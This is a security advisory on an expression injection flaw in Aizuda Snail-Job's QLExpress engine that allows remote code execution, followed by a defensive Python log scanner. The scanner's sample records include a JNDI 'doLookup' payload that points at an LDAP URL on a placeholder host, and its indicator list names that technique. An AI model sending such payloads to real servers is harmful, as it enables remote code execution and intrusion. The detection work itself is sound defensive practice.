Aizuda Snail-Job Expression Injection Vulnerability in QLExpress Engine Allowing Remote Code Execution
Vulnerability
An expression injection vulnerability has been identified in Aizuda Snail-Job versions through 1.6.0. The issue arises in the QLExpressEngine.doEval function, where user-controlled expressions are parsed without adequate security measures. This flaw allows remote attackers to inject expressions that the server evaluates using QLExpress, potentially leading to unauthorized code execution.
Impact
Exploitation of this vulnerability allows for remote code execution on the server where Snail-Job is running.
Reproduction
To reproduce this vulnerability, send a request to the '/workflow/check-node-expression' endpoint with a payload that includes a malicious expression. The QLExpress engine will execute the injected expression, bypassing default security restrictions. For example, an expression could be crafted to use 'javax.naming.InitialContext.doLookup' to perform a lookup that could lead to code execution.
Remediation
Upgrade to Aizuda Snail-Job version 1.7.0-beta1, which addresses this vulnerability by adding necessary security restrictions. The patched version is available on Gitee.
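For defenders who cannot upgrade immediately, the following is an added Python example (not code from this advisory or from the Snail-Job project) that scans request logs for calls to the '/workflow/check-node-expression' endpoint whose expression contains the 'javax.naming.InitialContext.doLookup' indicator the advisory cites. The JSON-per-line log layout, the sample records and the TEST-NET addresses are constructed assumptions, not Snail-Job's real log format.

```python
import json
import re
from urllib.parse import unquote

# Endpoint and indicator strings are the ones named in the advisory.
VULN_PATH = "/workflow/check-node-expression"
INDICATORS = ("javax.naming", "InitialContext", "doLookup")

# Constructed sample records in an assumed JSON-per-line request-log layout
# (not Snail-Job's real logging format); TEST-NET addresses are placeholders.
SAMPLE_RECORDS = [
    {"ts": "2024-01-01T10:00:00Z", "src": "10.0.0.5", "path": VULN_PATH,
     "body": {"expression": "#status == 1 && #retryCount < 3"}},
    {"ts": "2024-01-01T10:00:05Z", "src": "203.0.113.9", "path": VULN_PATH,
     "body": {"expression": 'javax.naming.InitialContext.doLookup("ldap://203.0.113.9/a")'}},
    {"ts": "2024-01-01T10:00:07Z", "src": "10.0.0.5", "path": "/workflow/list",
     "body": {"page": 1}},
    {"ts": "2024-01-01T10:00:09Z", "src": "198.51.100.7", "path": VULN_PATH,
     "body": {"expression": "javax%2Enaming%2EInitialContext%2EdoLookup(x)"}},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in SAMPLE_RECORDS)


def normalise(text):
    """URL-decode until stable, then drop whitespace and case so simple
    encoding or spacing tricks do not hide an indicator."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    return re.sub(r"\s+", "", text).lower()


def inspect_line(line):
    """Return a finding dict for a suspicious request line, else None."""
    try:
        rec = json.loads(line)
    except json.JSONDecodeError:
        return None          # unparsable line: not this detector's concern
    if rec.get("path") != VULN_PATH:
        return None          # only the endpoint the advisory names
    body = rec.get("body", "")
    haystack = normalise(body if isinstance(body, str) else json.dumps(body))
    hits = [ind for ind in INDICATORS if ind.lower() in haystack]
    if not hits:
        return None
    return {"ts": rec.get("ts"), "src": rec.get("src"), "indicators": hits}


def scan_log(text):
    """Scan a whole log text and return findings in log order."""
    findings = (inspect_line(ln) for ln in text.splitlines() if ln.strip())
    return [f for f in findings if f is not None]
```

A hit on this endpoint is a trigger for review of the source host and of the Snail-Job version in use, not proof of compromise; benign workflow expressions like the first sample record produce no finding.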